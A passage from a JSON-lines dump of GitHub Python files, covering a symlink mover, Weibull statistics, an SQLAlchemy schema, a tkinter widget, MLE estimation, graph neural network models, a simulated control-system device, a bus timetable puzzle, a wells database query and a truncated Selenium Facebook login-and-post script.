symbolic link is into the\n directory, keeping the same basename.\n :type dst: a :term:`path-like object`\n :raise `ArgumentError`: if *src* or *dst* is invalid.\n :raise `OperationError`: if an underlying operation fails.\n \"\"\"\n src0 = src\n dst0 = dst\n src = _fsdecode(src0)\n dst = _fsdecode(dst0)\n srclink = _do(lambda: os.readlink(src), \"readlink {!r}\".format(src))\n srcdir = os.path.dirname(src) or '.'\n srcbase = os.path.basename(src)\n assert srcbase\n dstdir = os.path.dirname(dst) or '.'\n dstbase = os.path.basename(dst)\n logger.debug(\"src={!r}, srcdir={!r}, srcbase={!r}, \"\n \"dst={!r}, dstdir={!r}, dstbase={!r}\"\n .format(src, srcdir, srcbase, dst, dstdir, dstbase))\n if _isdir(dst):\n dst = os.path.join(dst, srcbase)\n dstbase = os.path.basename(dst)\n dstdir = os.path.dirname(dst)\n assert dstbase == srcbase\n logger.debug(\"assuming dstbase=srcbase; \"\n \"now dst={!r}, dstdir={!r}, dstbase={!r}\"\n .format(dst, dstdir, dstbase))\n if not _isdir(dstdir):\n raise ArgumentError(\"destination {!r} does not exist \"\n \"or is not a directory\"\n .format(dstdir), src0, dst0)\n logger.debug(\"dstdir exists\")\n if os.path.samefile(srcdir, dstdir) and srcbase == dstbase:\n raise ArgumentError(\"source {!r} and destination {!r} \"\n \"refer to the same location\"\n .format(src, dst), src0, dst0)\n if os.path.isabs(srclink):\n dstlink = srclink\n else:\n srcreal = _do(lambda: os.path.realpath(src),\n \"obtain realpath for {!r}\".format(src))\n dstlink = os.path.relpath(srcreal, dstdir)\n logger.debug(\"srclink={!r}, dstlink={!r}\".format(srclink, dstlink))\n srcstat = _do(lambda: os.stat(src, follow_symlinks=False),\n \"stat {!r}\".format(src))\n _do(lambda: os.symlink(dstlink, dst),\n \"symlink {!r} -> {!r}\".format(dst, dstlink))\n try:\n if os.geteuid() == 0:\n _do(lambda: os.chown(dst, srcstat.st_uid, srcstat.st_gid,\n follow_symlinks=False),\n \"chown {!r} to {!r}:{!r}\"\n .format(dst, srcstat.st_uid, srcstat.st_gid))\n srcmode = stat.S_IMODE(srcstat.st_mode)\n _do(lambda: os.chmod(dst, srcmode, follow_symlinks=False),\n \"chmod {!r} to {:#o}\".format(dst, srcmode))\n _unlink_if_exists(src)\n except Exception:\n _unlink_if_exists(dst)\n raise\n\n\ndef main():\n \"\"\"Run this module as a command.\"\"\"\n parser = argparse.ArgumentParser()\n logging.basicConfig(format=(\"{}: %(levelname)s: %(message)s\"\n .format(parser.prog)))\n logger.setLevel(logging.WARNING)\n parser.add_argument('--debug', action='store_const', const=True,\n help=\"\"\"enable debugging\"\"\")\n parser.add_argument('src', nargs='+', help=\"\"\"source symbolic link\"\"\")\n parser.add_argument('dst', help=\"\"\"destination symbolic link\"\"\")\n parser.set_defaults(debug=False)\n args = parser.parse_args()\n if args.debug:\n logger.setLevel(logging.DEBUG)\n\n if len(args.src) > 1:\n try:\n dst_is_dir = _isdir(args.dst)\n except OperationError as e:\n logger.error(e, exc_info=(e if args.debug else None))\n return 1\n if not dst_is_dir:\n logger.error(\"more than one source is given \"\n \"but destination {!r} is not a directory\"\n .format(args.dst))\n return 1\n\n ok = True\n for src in args.src:\n try:\n move_symlink(src, args.dst)\n except OperationError as e:\n logger.error(e, exc_info=(e if args.debug else None))\n ok = False\n\n return 0 if ok else 1\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"astralblue/movesymlink","sub_path":"movesymlink.py","file_name":"movesymlink.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33263077177","text":"import numpy as np\nimport math\n\ndef pdf(wsp, A, k):\n # returns the probability density at wind speed wsp for a weibull\n # distribution described by the parameters A and k.\n pdf = lambda x: k/A*(x/A)**(k-1)*np.exp(-(x/A)**k)\n\n return pdf(wsp)\n\ndef cdf(wsp, A, k):\n # returns the cumulative density at wind speed wsp for a weibull\n # distribution described by the parameters A and k.\n cdf = lambda x: 1 - np.exp(-(x/A)**k)\n\n return cdf(wsp)\n\ndef wsp_probs(Class=1, dx=2, Range= [4, 26.1]):\n # Weibull Parameters\n k = 2\n if Class == 1:\n A = 10/math.gamma(1+1/k)\n elif Class == 2:\n A = 8.5/math.gamma(1+1/k)\n elif Class == 3:\n A = 7.5/math.gamma(1+1/k)\n print(A)\n # Weibull cdf function\n cdf = lambda x: 1 - np.exp(-(x/A)**k)\n #Discrete wind speeds\n Y = np.arange(Range[0], Range[1], dx)\n\n # Probabilities of each wind speed\n P = [(cdf(y+dx/2) - cdf(y-dx/2))/dx for y in Y]\n\n return dict(zip(Y, P))\n\n\nif __name__ == '__main__':\n p = wsp_probs()","repo_name":"jaimeliew1/MasterThesis-TipDeflectionControl","sub_path":"Other/Weibull.py","file_name":"Weibull.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"24103853214","text":"from sqlalchemy import Column, MetaData, Table\nfrom sqlalchemy.sql.sqltypes import BigInteger, Integer, Numeric, Text\n\nmeta = MetaData()\n\nschema = [\n Table(\n \"zadatele\",\n meta,\n Column(\n \"id_prijemce\",\n BigInteger,\n nullable=False,\n primary_key=True,\n autoincrement=False,\n ),\n Column(\"rok\", Integer, nullable=False, primary_key=True, autoincrement=False),\n Column(\"jmeno_nazev\", Text, nullable=False),\n Column(\"obec\", Text, nullable=True),\n Column(\"okres\", Text, nullable=True),\n Column(\"castka_bez_pvp\", Numeric(12, 2), nullable=False),\n ),\n Table(\n \"platby\",\n meta,\n Column(\"id_prijemce\", BigInteger, nullable=False),\n Column(\"rok\", Integer, nullable=False),\n Column(\"fond_typ_podpory\", Text, nullable=False),\n Column(\"opatreni\", Text, nullable=False),\n Column(\"zdroje_cr\", Numeric(12, 2), nullable=True),\n Column(\"zdroje_eu\", Numeric(12, 2), nullable=True),\n Column(\"celkem_czk\", Numeric(12, 2), nullable=False),\n ),\n]\n\n\nif __name__ == \"__main__\":\n from sqlalchemy import create_engine\n from sqlalchemy.schema import CreateTable\n\n engine = create_engine(\"sqlite:///:memory:\")\n for table in schema:\n print(f\"-- {table.name} as created in SQLite\")\n print(CreateTable(table).compile(engine))\n","repo_name":"kokes/od","sub_path":"data/szif/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"27"} +{"seq_id":"7929292196","text":"from tkinter import *\nfrom tkinter import ttk\nfrom src.Palette import PaletteElem\n\n\nclass CharacterPicker(ttk.Frame):\n \"\"\"a widget for storing and letting the user modify a character\"\"\"\n\n def __init__(self, root, name=\"Character\", font_width=20, height=20, **kwargs):\n super().__init__(root, **kwargs)\n\n self.root = root\n\n self.font_width = font_width\n self.height = height\n\n self.change_callback = None\n\n # setup name\n self.name = StringVar(root, name)\n self.name_label = ttk.Label(self, textvariable=self.name, style='TLabel')\n\n # setup data visualization\n self.char_vis = PaletteElem(self, font_width=font_width, height=height)\n self.char_vis['style'] = 'PalettePressed.TFrame'\n\n # setup user input\n self.char_code = StringVar(root)\n self.character_entry = ttk.Entry(self, textvariable=self.char_code, width=9)\n self.character_entry.bind('', self.__acceptInput)\n\n # organize layout\n self.rowconfigure(0, weight=1)\n\n self.name_label.grid(column=0, row=0, sticky='SW')\n self.char_vis.grid(column=0, row=1, sticky='NSEW')\n self.character_entry.grid(column=0, row=2, sticky='NSEW')\n\n def changeForeground(self, foreground):\n self.char_vis.data.foreground_color = foreground\n self.char_vis.updateVis()\n\n def getChar(self):\n return self.char_vis.data.character\n\n def setChar(self, char):\n self.char_vis.data.character = char\n self.char_vis.updateVis()\n\n def onCharacterChanged(self, func):\n \"\"\"calls [func] when the stored character is changed. Should accept a character as an argument\"\"\"\n\n self.change_callback = func\n\n def __acceptInput(self, event):\n \"\"\"\n Accepts input as either a character, a positive integer, or a hex-value.\n A hex value must start with an [#] or else it will be detected as invalid input or an integer input\n \"\"\"\n\n if len(self.char_code.get()) > 0:\n # detect character input\n if len(self.char_code.get()) == 1:\n self.char_vis.data.character = self.char_code.get()\n\n if self.change_callback is not None:\n self.change_callback(self.getChar())\n\n self.char_vis.updateVis()\n return\n\n # detect integer input\n try:\n code = int(self.char_code.get())\n self.char_vis.data.character = chr(code)\n\n if self.change_callback is not None:\n self.change_callback(self.getChar())\n\n self.char_vis.updateVis()\n return\n except (ValueError, OverflowError):\n pass\n\n # detect hex input\n if self.char_code.get()[0] == '#':\n try:\n code = int(self.char_code.get()[1:], 16)\n self.char_vis.data.character = chr(code)\n\n if self.change_callback is not None:\n self.change_callback(self.getChar())\n\n self.char_vis.updateVis()\n return\n except (ValueError, OverflowError):\n pass\n\n print(f'Invalid input [{self.char_code.get()}]')\n \n\n\n\n\nif __name__ == \"__main__\":\n root = Tk()\n root.minsize(300, 300)\n\n root.columnconfigure(0, weight=1)\n root.rowconfigure(0, weight=1)\n\n c = CharacterPicker(root)\n c.grid(column=0, row=0, sticky='NSEW')\n\n root.mainloop()\n\n","repo_name":"karstensensensen/ARTEditor","sub_path":"src/CharacterPicker.py","file_name":"CharacterPicker.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42369432034","text":"from functools import wraps\nfrom time import process_time_ns\n\n\ndef time_taken(func):\n # @wraps()\n def inner(*args, **kwargs):\n start = process_time_ns()\n result = func(*args, **kwargs)\n print(f\"TIME TAKEN:{process_time_ns() - start}\")\n return result\n\n return inner\n\n\n@time_taken\ndef getShiftedString(s, leftShifts, rightShifts):\n print(\"leftshift\", leftShifts, \"rightShifts\", rightShifts)\n str_len = len(s)\n if leftShifts > str_len:\n leftShifts = leftShifts % str_len\n if rightShifts > str_len:\n rightShifts = rightShifts % str_len\n\n # print(\"original = \", s)\n for _ in range(leftShifts):\n s = s[1:] + s[0]\n # print('leftshift =', s)\n for _ in range(rightShifts):\n s = s[-1] + s[:-1]\n # print(\"rightshift =\", s)\n return s\n\n\nif __name__ == \"__main__\":\n assert getShiftedString(\"abcdef\", 10, 8) == \"cdefab\"\n assert getShiftedString(\"abcdef\", 4, 8) == \"cdefab\"\n","repo_name":"udhayprakash/Python_for_interview_preparation","sub_path":"Practice/hackerrank/shifting_string.py","file_name":"shifting_string.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"2469805285","text":"# 1 Gold Star\n\n# The built-in .split() procedure works\n# okay, but fails to find all the words on a page\n# because it only uses whitespace to split the\n# string. To do better, we should also use punctuation\n# marks to split the page into words.\n\n# Define a procedure, split_string, that takes two\n# inputs: the string to split and a string containing\n# all of the characters considered separators. The\n# procedure should return a list of strings that break\n# the source string up by the characters in the\n# splitlist.\n\n\ndef split_string(source,splitlist):\n splitedStr = []\n strLen = len(source)\n i = 0\n strTmp = '';\n while i< strLen:\n index = splitlist.find(source[i])\n if(index==-1):\n strTmp += source[i]\n else:\n if(strTmp != ''):\n splitedStr.append(strTmp)\n strTmp = ''\n i += 1\n if strTmp != '':\n splitedStr.append(strTmp)\n return splitedStr\n","repo_name":"PhenixI/introduction-of-computer-udacity","sub_path":"lesson4/lesson4_betterSplitting.py","file_name":"lesson4_betterSplitting.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30525991595","text":"'''\n------------------------------------------------------------------------\nThis is Bobae's main script for PS3 of MACS 40000: Structural Estimation.\n------------------------------------------------------------------------\n'''\n# import pacakges\nimport numpy as np\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport scipy as sp\nimport scipy.stats as sts\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\n\n# import data\ndata = DataFrame(pd.read_csv('MacroSeries.txt', header = None))\nct, kt, wt, rt = data[0], data[1], data[2], data[3]\n'''\n(a) Use the data (wt, kt) and equations (3) and (5) to estimate the\nfour parameters (\u000Balpha, rho, mu, sigma\u001B) by maximum likelihood.\n'''\ndef a_pdf(wt, kt, params):\n\n alpha, rho, mu, sigma = params[0], params[1], params[2], params[3]\n\n zt = np.log( wt / (1.0 - rho) / kt**alpha )\n # zt = np.log(wt)- np.log(1.0 - rho) - alpha* np.log(kt)\n zt_lag = []\n for i in range(len(zt)):\n if i == 0:\n zt_lag.append(mu)\n else:\n zt_lag.append(zt[i - 1])\n\n loc0 = (rho * Series(zt_lag)) + ((1.0 - rho) * mu)\n pdf_vals = sts.norm.pdf(Series(zt), loc = loc0, scale = sigma)\n\n return pdf_vals\n\ndef log_lik_a(wt, kt, params):\n\n pdf_vals = a_pdf(wt, kt, params)\n ln_pdf_vals = np.log(pdf_vals)\n log_lik_val = ln_pdf_vals.sum()\n\n return log_lik_val\n\ndef crit_a(params, *args):\n\n wt, kt = args\n log_lik_val = log_lik_a(wt, kt, params)\n neg_log_lik_val = -log_lik_val\n\n return neg_log_lik_val\n\n# initial attempt\na_mle_args = (wt, kt)\na_bounds = ((1e-10, 1 - 1e-10), (-1 + 1e-10, 1 - 1e-10), (1e-10, None), (1e-10, None))\na_alpha_0, a_rho_0, a_mu_0, a_sig_0 = 0.5, 0.5, 5.0, 5.0\na_params_1 = np.array([a_alpha_0, a_rho_0, a_mu_0, a_sig_0])\na_results1 = opt.minimize(crit_a, a_params_1, args=(a_mle_args), bounds = a_bounds,\n method = 'SLSQP', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQP'\na_alpha_MLE1, a_rho_MLE1, a_mu_MLE1, a_sig_MLE1 = a_results1.x\n# print(a_results1) # optimization succeeded!\n\n# second attempt with first MLE values (to get a hessian matrix)\na_params_2 = np.array([a_alpha_MLE1, a_rho_MLE1, a_mu_MLE1, a_sig_MLE1])\na_results2 = opt.minimize(crit_a, a_params_2, args=(a_mle_args), bounds = a_bounds,\n method = 'L-BFGS-B', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQP'\na_alpha_MLE2, a_rho_MLE2, a_mu_MLE2, a_sig_MLE2 = a_results2.x\n# print(a_results2) # optimization succeeded!\n\nif True: # report the results\n print('Report the MLE results for (a):')\n print('alpha_MLE = ', a_alpha_MLE2, 'rho_MLE = ', a_rho_MLE2,\n 'mu_MLE = ', a_mu_MLE2, ' sig_MLE = ', a_sig_MLE2)\n print('the value of the likelihood function = ', a_results2.fun)\n print('VCV = ', a_results2.hess_inv.todense())\n\n'''\n(b) Use the data (rt, kt) and equations (4) and (5) to estimate the\nfour parameters (\u000Balpha, rho, mu, sigma\u001B) by maximum likelihood.\n'''\ndef b_pdf(rt, kt, params):\n\n alpha, rho, mu, sigma = params[0], params[1], params[2], params[3]\n\n zt = np.log(rt / (alpha * (kt**alpha)))\n # zt = np.log(rt) - np.log(alpha) - alpha*np.log(kt)\n\n zt_lag = []\n for i in range(len(zt)):\n if i == 0:\n zt_lag.append(mu)\n else:\n zt_lag.append(zt[i - 1])\n\n loc0 = (rho * Series(zt_lag)) + ((1.0 - rho) * mu)\n pdf_vals = sts.norm.pdf(Series(zt), loc = loc0, scale = sigma)\n\n return pdf_vals\n\ndef log_lik_b(rt, kt, params):\n\n pdf_vals = a_pdf(rt, kt, params)\n ln_pdf_vals = np.log(pdf_vals)\n log_lik_val = ln_pdf_vals.sum()\n\n return log_lik_val\n\ndef crit_b(params, *args):\n\n rt, kt = args\n log_lik_val = log_lik_a(rt, kt, params)\n neg_log_lik_val = -log_lik_val\n\n return neg_log_lik_val\n\n# initial attempt, using the MLE results from (a)\nb_mle_args = (rt, kt)\nb_bounds = ((1e-10, 1 - 1e-10), (-1 + 1e-10, 1 - 1e-10), (1e-10, None), (1e-10, None))\nb_alpha_0, b_rho_0, b_mu_0, b_sig_0 = 0.5, 0.5, 10.0, 1.0\nb_params_1 = np.array([b_alpha_0, b_rho_0, b_mu_0, b_sig_0])\nb_results1 = opt.minimize(crit_b, b_params_1, args=(b_mle_args), bounds = b_bounds,\n method = 'L-BFGS-B', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQP'\nb_alpha_MLE1, b_rho_MLE1, b_mu_MLE1, b_sig_MLE1 = b_results1.x\n# print(b_results1) # optimization succeeded!\n\n# second attempt using the first MLE values\nb_params_2 = np.array([b_alpha_MLE1, b_rho_MLE1, b_mu_MLE1, b_sig_MLE1])\nb_results2 = opt.minimize(crit_b, b_params_2, args=(b_mle_args), bounds = b_bounds,\n method = 'L-BFGS-B', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQS'\nb_alpha_MLE2, b_rho_MLE2, b_mu_MLE2, b_sig_MLE2 = b_results2.x\n# print(b_results2) # optimization succeeded with smaller score!\n\n# third attempt using the second MLE values\nb_params_3 = np.array([b_alpha_MLE2, b_rho_MLE2, b_mu_MLE2, b_sig_MLE2])\nb_results3 = opt.minimize(crit_b, b_params_3, args=(b_mle_args), bounds = b_bounds,\n method = 'L-BFGS-B', options ={'ftol': 1e-10}) # other methods, 'L-BFGS-B', 'SLSQS'\nb_alpha_MLE3, b_rho_MLE3, b_mu_MLE3, b_sig_MLE3 = b_results3.x\n# print(b_results3) # optimization succeeded with smaller score! (another attempt yields the same score)\n\nif True: # report the result\n print('Report the MLE results for (b):')\n print('alpha_MLE = ', b_alpha_MLE3, 'rho_MLE = ', b_rho_MLE3,\n 'mu_MLE = ', b_mu_MLE3, ' sig_MLE = ', b_sig_MLE3)\n print('the value of the likelihood function = ', b_results3.fun)\n print('VCV = ', b_results3.hess_inv.todense())\n\n'''\n(c) According to your estimates from part (a), if investment/savings\nin the current period is kt = 7,500,000 and the productivity shock in the\nprevious period was zt_lag = 10, what is the probability that the interest\nrate this period will be greater than rt = 1?\n'''\nz_star = np.log(1 / (a_alpha_MLE2 * (7500000)**a_alpha_MLE2))\nloc_c = (a_rho_MLE2 * Series(10)) + ((1.0 - a_rho_MLE2) * a_mu_MLE2)\nc_prob = 1 - sts.norm.cdf(z_star, loc = loc_c, scale = a_sig_MLE2)\nif True: # report the result\n print('Pr(rt > 1 | theta-hat, kt = 7500000, z_lag = 10) = ', c_prob)\n","repo_name":"bobaekang/uc-mlpp","sub_path":"previous_code/MACS_40200_winter_17/Kang_StructEst_PS3.py","file_name":"Kang_StructEst_PS3.py","file_ext":"py","file_size_in_byte":6164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19016032948","text":"import torch\nfrom torch import nn\nfrom torch.nn.modules.module import Module\nimport numpy as np\nimport networkx as nx\nimport pandas as pd\nfrom torch import optim\nimport seaborn as sns\nimport random\nfrom itertools import permutations, combinations\nfrom matplotlib import pyplot as plt\n\n\nclass MeanAggregator(Module):\n '''\n This class does the sampling and aggregating given a set of features\n\n We store everything except the set of nodes to aggregate on the class\n\n We pass the nodes (batch, neg samples, etc) to forward\n '''\n def __init__(\n self,\n features,\n feature_dim,\n emb_dim,\n n_nbr_samples,\n g,\n dropout=0.5,\n depth=1,\n batchnorm=True,\n ):\n super(MeanAggregator, self).__init__()\n self.feature_dim = feature_dim\n self.depth = depth\n if batchnorm:\n self.fc = nn.Sequential(\n nn.Linear(feature_dim, emb_dim),\n nn.BatchNorm1d(emb_dim),\n nn.Tanh(),\n nn.Dropout(dropout),\n )\n else:\n self.fc = nn.Sequential(\n nn.Linear(feature_dim, emb_dim),\n nn.Tanh(),\n nn.Dropout(dropout),\n )\n self.features = features\n self.n_nbr_samples = n_nbr_samples\n self.g = g # can be any dict like: {node: collection(nbrs)}\n self.random_ = np.random.choice\n self.set_ = set\n\n def forward(\n self,\n node_list,\n randomize_features=False,\n ):\n '''\n features is (unique_node_dim by feature_dim)\n mask is (node_list by unique_node_dim)\n '''\n samples = [\n list(self.random_(\n list(self.g[node]),\n self.n_nbr_samples,\n replace=False,\n )) + [node]\n if len(self.g[node]) >= self.n_nbr_samples else list(self.g[node]) + [node]\n for node in node_list\n ]\n unique_nodes_list = list(set.union(*(self.set_(x) for x in samples)))\n unique_nodes_dict = {node: idx for idx, node in enumerate(unique_nodes_list)}\n\n mask = torch.zeros(len(samples), len(unique_nodes_list))\n\n row_idxs = []\n col_idxs = []\n for node_idx, node_nbrs in enumerate(samples):\n for alter in node_nbrs:\n row_idxs.append(node_idx)\n col_idxs.append(unique_nodes_dict[alter])\n sampled_features = self.fc(self.features(unique_nodes_list))\n mask[row_idxs, col_idxs] = 1\n mask = mask.div(mask.sum(dim=1).unsqueeze(1))\n if randomize_features:\n mask = mask[torch.randperm(mask.size()[0])]\n return mask.mm(sampled_features)\n\n\nclass EncodingLayer(Module):\n '''\n Forward takes a batch and an aggregator\n It runs one iter of the aggregator and then applies the encoding layer to it\n '''\n def __init__(\n self,\n features,\n feature_dim,\n emb_input_dim,\n emb_dim,\n g,\n agg,\n base_model=None,\n dropout=0.5,\n depth=1,\n batchnorm=True,\n ):\n super(EncodingLayer, self).__init__()\n self.features = features\n self.emb_dim = emb_dim\n self.g = g\n self.agg = agg\n self.depth = depth\n if base_model:\n self.base_model = base_model\n self.fc = nn.Sequential(\n nn.Linear(emb_input_dim, emb_dim),\n nn.BatchNorm1d(emb_dim),\n nn.Tanh(),\n nn.Dropout(dropout),\n )\n\n\n def forward(self, node_list, randomize_features=False):\n emb = self.agg(\n node_list=node_list,\n randomize_features=randomize_features,\n )\n emb = self.fc(\n emb\n )\n return emb\n\n\nclass MeanModel(Module):\n def __init__(\n self,\n emb_dim,\n n_nbr_samples1,\n n_nbr_samples2,\n g,\n features,\n hidden_dim=8,\n dropout=0.5,\n ):\n super(MeanModel, self).__init__()\n feature_dim = features.size()[1]\n self.agg1 = MeanAggregator(\n features=lambda x: features[x],\n feature_dim=feature_dim,\n emb_dim=hidden_dim,\n n_nbr_samples=n_nbr_samples1,\n g=g,\n dropout=dropout,\n batchnorm=True,\n )\n self.enc1 = EncodingLayer(\n features=lambda x: features[x],\n feature_dim=feature_dim,\n emb_input_dim=hidden_dim,\n emb_dim=hidden_dim,\n g=g,\n agg=self.agg1,\n base_model=None,\n depth=2,\n dropout=dropout,\n batchnorm=True,\n )\n self.agg2 = MeanAggregator(\n features=lambda x: self.enc1(x),\n feature_dim=hidden_dim,\n emb_dim=hidden_dim,\n n_nbr_samples=n_nbr_samples2,\n g=g,\n dropout=dropout,\n batchnorm=True,\n )\n self.enc2 = EncodingLayer(\n features=lambda x: self.enc1(x),\n feature_dim=hidden_dim,\n emb_input_dim=hidden_dim,\n emb_dim=emb_dim,\n g=g,\n agg=self.agg2,\n base_model=self.enc1,\n depth=1,\n dropout=dropout,\n batchnorm=True,\n )\n self.model = self.enc2.apply(init_weights)\n\n def forward(self, node_list, randomize_features=False):\n if self.model.training:\n return self.model(node_list, randomize_features)\n else:\n return torch.cat(\n (\n self.enc2(node_list, False),\n self.enc1(node_list, False),\n ),\n dim=1,\n )\n\n\ndef sigmoid_loss(emb_u, emb_v, emb_neg, pos_weight):\n logsigmoid = nn.LogSigmoid()\n emb_v = emb_v.view(emb_u.size()[0], -1, emb_u.size()[1])\n emb_neg = emb_neg.view(emb_u.size()[0], -1, emb_u.size()[1])\n pos = logsigmoid((emb_u.unsqueeze(1) * emb_v).sum(dim=2)).mean()\n neg = logsigmoid(-(emb_u.unsqueeze(1) * emb_neg).sum(dim=2)).mean()\n return - (pos + neg)\n\n\ndef init_weights(m):\n if type(m) == nn.Linear:\n torch.nn.init.xavier_uniform_(m.weight)\n\n\n\ndef pad_features(features, feature_max_len):\n while len(features) < feature_max_len:\n features.append(0)\n if len(features) > feature_max_len:\n features = np.random.choice(\n features,\n size=feature_max_len,\n )\n return features\n","repo_name":"georgeberry/role-action-embeddings","sub_path":"small_graphs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"9811772843","text":"# This file creates demo devices that simulate data\n# broadcast via PyJapc. It uses PAPC - a PyJapc\n# Python simulation replacement. At runtime, PyJapc will\n# be substituted with this interface and the data will\n# be coming not from a real control system but devices\n# created in this file. Hence, you can run the example\n# outside of TN with deterministic data.\n\nfrom papc.device import Device\nfrom papc.system import System\nfrom papc.deviceproperty import Acquisition\nfrom papc.fieldtype import FieldType\nfrom papc.simulator.trig import RepeatedTimer\nimport random\n\n\nclass DemoDevice(Device):\n \"\"\"\n Demo device produces two fields with random integers in range (0, 100).\n \"\"\"\n frequency = 1\n\n def __init__(self):\n super().__init__(name='DemoDevice', device_properties=(\n Acquisition(name='Acquisition', fields=(\n FieldType(name='ChannelA', datatype='int', initial_value=0),\n FieldType(name='ChannelB', datatype='int', initial_value=0),\n )),\n ))\n self._is_tick = True\n self._timer = RepeatedTimer(1 / self.frequency, self.time_tick)\n\n def time_tick(self):\n \"\"\"Callback on timer fire.\"\"\"\n self.set_state(new_values={\n 'Acquisition#ChannelA': random.randint(0, 100),\n 'Acquisition#ChannelB': random.randint(0, 100),\n }, timing_selector='')\n\n\ndef create_device():\n \"\"\"Entrypoint for the example to start simulating data flow.\"\"\"\n d = DemoDevice()\n d.time_tick() # Trigger the first/initial tick (gives us nicer values).\n return System(devices=[d])\n","repo_name":"jfpatrick/accsoft-gui-rad-comrad","sub_path":"_comrad_examples/g2_advanced/e6_value_aggregator/japc_device.py","file_name":"japc_device.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33774335881","text":"def time_to_int(str_time):\n return (int(str_time.split(\":\")[0]) * 60) + int(str_time.split(\":\")[1])\n\n\ndef solution(n, t, m, timetable):\n answer = ''\n start_time = 540\n timetable = sorted(list(map(time_to_int, timetable)))\n on_bus_lists = [[] for _ in range(n)]\n\n for shuttle in range(n):\n for man in range(m): # 최대 m명까지 탈 수 있음\n if len(timetable) > 0:\n if timetable[0] <= start_time + (shuttle * t):\n on_bus_lists[shuttle].append(timetable.pop(0))\n else: # 더이상 탈 사람이 안옴\n break\n\n on_bus_list = on_bus_lists[-1]\n if len(on_bus_list) >= m:\n answer = list(set(on_bus_list))[-1] - 1\n else:\n answer = start_time + (t * (n - 1))\n\n print(on_bus_lists)\n return \"{:02d}:{:02d}\".format(answer // 60, answer % 60)\n\n\ntest_case = [\n 2, 10, 2, [\"09:10\", \"09:09\", \"08:00\"], \"09:09\"\n]\n\nres = solution(test_case[0], test_case[1], test_case[2], test_case[3])\nprint(res)\nif res == test_case[-1]:\n print(\"goood\")\nelse:\n print(\"fail \")\n","repo_name":"bearics/coding-test","sub_path":"pro-17678.py","file_name":"pro-17678.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1567802478","text":"import os\n\nfrom sqlalchemy import create_engine, text\n\nWELLS_URL = os.getenv('WELLS_URL')\n\ndef query_db(min_depth, min_gradient):\n \"\"\"Returns wells that fit the search criteria.\"\"\"\n\n engine = create_engine(WELLS_URL)\n \n query = text(\n \"\"\"SELECT latitude, longitude, depth, gradient\n FROM wells\n WHERE depth > :min_depth AND gradient > :min_gradient\n \"\"\"\n )\n with engine.connect() as conn:\n results = (\n conn\n .execute(query, {'min_depth': min_depth, 'min_gradient': min_gradient})\n .fetchall()\n )\n\n return results\n\nif __name__ == '__main__':\n import sys\n\n min_depth = float(sys.argv[1])\n min_gradient = float(sys.argv[2])\n\n print(query_db(min_depth, min_gradient))\n\n","repo_name":"craw-daddy/wells-202306","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19656449321","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nfrom .utils import getStringBetween\n\nimport time\nimport random\n\n\n\nclass Account:\n\n\tdef __init__(self, CHROMEDRIVER_PATH=None, headless=True):\n\t\toptions = Options()\n\t\toptions.headless = headless\n\t\tself.browser = webdriver.Chrome(CHROMEDRIVER_PATH, chrome_options=options)\n\t\tself.authenticated = False\n\t\tself.id = None\n\t\tself.email = None\n\t\tself.password = None\n\n\n\t\n\tdef authenticate(self, email, password):\n\t\t\"\"\"authenticate and store the account id\"\"\"\n\t\ttry:\n\t\t\tself.browser.get(\"https://m.facebook.com\")\n\t\t\tself.browser.find_element_by_name(\"email\").send_keys(email)\n\t\t\tself.browser.find_element_by_name(\"pass\").send_keys(password + Keys.RETURN)\n\n\t\t\tif \"https://m.facebook.com\" == self.browser.current_url:\n\t\t\t\traise Exception(\"wrong email or password\")\n\t\t\tself.email = email\n\t\t\tself.password = password\n\t\t\tself.authenticated = True\n\t\t\ttime.sleep(5)\n\t\t\ttry:\t\t\n\t\t\t\tself.browser.get(\"https://m.facebook.com/profile.php\")\n\t\t\t\telem = self.browser.find_element_by_css_selector('a[href*=\"/allactivity\"]')\n\t\t\t\tself.id = elem.get_attribute(\"href\").split(\"/\")[-2]\n\t\t\texcept:\n\t\t\t\traise Exception(\"cannot get account id\")\n\t\texcept Exception as e:\n\t\t\tprint(f\"Authentication Failed: {e}\")\n\t\t\tself.exit()\n\n\n\tdef post_profile(self, text):\n\t\t\"\"\"make a profile post and return its id\"\"\"\n\t\ttry:\n\t\t\tif not self.authenticated:\n\t\t\t\traise(Exception(\"not 